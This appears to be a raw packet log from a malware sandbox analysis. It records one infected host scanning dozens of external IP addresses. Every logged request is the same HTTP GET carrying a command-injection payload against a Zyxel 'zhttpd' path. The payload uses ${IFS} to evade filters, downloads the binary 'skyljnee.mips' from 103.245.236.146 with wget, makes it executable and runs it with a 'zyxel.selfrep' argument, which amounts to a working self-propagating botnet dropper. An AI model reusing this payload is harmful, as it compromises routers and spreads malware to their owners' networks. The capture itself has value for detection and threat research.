                                                        Jan 28, 2024 10:13:09.735429049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8617192.168.2.1453448192.13.94.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735452890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8618192.168.2.1438756133.52.31.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735503912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8619192.168.2.1453766177.167.94.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735552073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8620192.168.2.145136898.71.75.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735605001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8621192.168.2.1446976125.13.150.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735630989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8622192.168.2.1458692146.183.221.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735660076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8623192.168.2.143749835.151.107.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735706091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8624192.168.2.1457292204.119.147.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735759974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8625192.168.2.145443077.45.27.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735790014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8626192.168.2.1459718184.165.14.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735810041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8627192.168.2.143355037.216.176.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735861063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8628192.168.2.1437774218.148.198.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735888958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8629192.168.2.1453260209.142.250.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735925913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8630192.168.2.1435080163.129.36.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735966921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8631192.168.2.1443218106.92.65.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736013889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8632192.168.2.1437984207.214.126.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736044884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8633192.168.2.1460602190.221.157.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736105919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8634192.168.2.1442926167.40.74.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736152887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8635192.168.2.143745038.63.77.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736193895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8636192.168.2.1443062210.79.132.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736223936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8637192.168.2.1444824115.228.240.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736247063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8638192.168.2.1444628158.236.97.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736301899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8639192.168.2.1453966126.83.206.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736336946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8640192.168.2.1446088181.61.130.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736375093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8641192.168.2.1442528148.209.11.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736409903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8642192.168.2.1444784155.40.184.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736459017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8643192.168.2.14433442.250.46.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736496925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8644192.168.2.144272067.27.184.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736550093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8645192.168.2.1456868218.44.104.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736577988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8646192.168.2.144858269.170.76.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736625910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8647192.168.2.144312442.158.123.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736653090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8648192.168.2.1457132180.40.199.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736687899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8649192.168.2.143844890.26.216.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736733913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8650192.168.2.1456346142.93.11.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736783028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8651192.168.2.1459164211.14.175.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736823082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8652192.168.2.143544824.204.31.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736864090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8653192.168.2.145727020.210.220.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736891031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8654192.168.2.145276273.118.179.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736922979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8655192.168.2.145410670.25.108.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.736943960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8656192.168.2.1445676131.75.144.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737001896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8657192.168.2.1452500188.182.35.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737029076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8658192.168.2.1444308126.162.67.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737085104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8659192.168.2.144739027.218.51.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737133026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8660192.168.2.145579868.35.219.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737153053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8661192.168.2.1460312194.255.193.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737202883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8662192.168.2.1454566109.216.205.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737250090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8663192.168.2.1437300223.17.36.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737297058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8664192.168.2.1450668123.81.84.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737322092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8665192.168.2.145179219.151.233.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737368107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8666192.168.2.145577663.96.85.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737391949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8667192.168.2.1434610160.131.227.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737447023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8668192.168.2.1456742112.220.195.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737488985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8669192.168.2.144540243.243.175.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737538099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8670192.168.2.1433888185.107.90.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737585068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8671192.168.2.145894262.8.250.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737608910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8672192.168.2.1459250200.39.29.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737633944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8673192.168.2.144249027.109.46.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737694979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8674192.168.2.1453816130.110.139.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737744093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8675192.168.2.14587229.30.204.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737772942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8676192.168.2.1454748109.95.111.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737797976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8677192.168.2.143722688.151.161.26443
                                                        TimestampBytes transferredDirectionData
